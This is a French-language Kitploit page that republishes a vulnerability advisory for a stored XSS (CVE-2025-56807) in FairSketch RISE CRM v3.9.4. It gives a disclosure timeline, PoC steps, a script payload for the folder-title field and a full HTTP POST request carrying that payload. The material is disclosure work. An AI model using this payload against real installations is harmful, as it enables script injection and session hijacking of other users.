Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-56807 — CVE-2025-56807: A Stored Cross Site Scripting (XSS) vulnerability was discovered in FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) in the File Manager functionality. | Kitploit
Outils/GitHubGitHub/aqwainfosec/cve-2025-56807
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubaqwainfosec/cve-2025-56807

CVE-2025-56807

CVE-2025-56807: A Stored Cross Site Scripting (XSS) vulnerability was discovered in FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) in the File Manager functionality.

Voir le dépôt
il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-56807

Description

Une vulnérabilité de type Cross Site Scripting (XSS) stocké a été découverte dans FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) dans la fonctionnalité de gestion de fichiers. La vulnérabilité réside dans le paramètre title qui est soumis lors de la création de nouveaux dossiers. En raison d'une désinfection insuffisante des entrées, un attaquant peut injecter des charges utiles HTML/JavaScript (par exemple, <details/open/ontoggle=prompt(origin)>). La charge utile est stockée dans le nom du dossier et exécutée lors de l'affichage des dossiers dans le gestionnaire de fichiers, permettant l'exécution arbitraire de JavaScript dans le navigateur de tout utilisateur qui consulte le dossier affecté. Cela peut entraîner un détournement de session et une exfiltration de données.

[!NOTE]
Cette vulnérabilité n'est pas exclusive aux comptes administrateur. Elle peut être exploitée en utilisant n'importe quel compte utilisateur disposant de l'autorisation de créer de nouveaux dossiers dans le gestionnaire de fichiers.

Calendrier de divulgation

  • Identifiant CVE attribué : CVE-2025-56807
  • Découverte : Juillet 2025 (par Aqwa Hameed)
  • Fournisseur notifié : Email envoyé au support Fairsketch
  • Réponse : Accusé de réception par le fournisseur le 22 juillet 2025

Preuve de concept (PoC)

  1. Connectez-vous avec des identifiants valides.

  2. Accédez à Fichiers

    Tableau de bord

  3. Cliquez sur Nouveau dossier

    Gestionnaire de fichiers

  4. Saisissez la charge utile ci-dessous dans le champ Titre, saisissez :

root@kitploit:~
<details/open/ontoggle=prompt(origin)>

Titre du dossier

  1. Rechargez la page du gestionnaire de fichiers pour déclencher la charge utile

    Exécution de la charge utile

Requête

root@kitploit:~
POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
Télécharger l’outil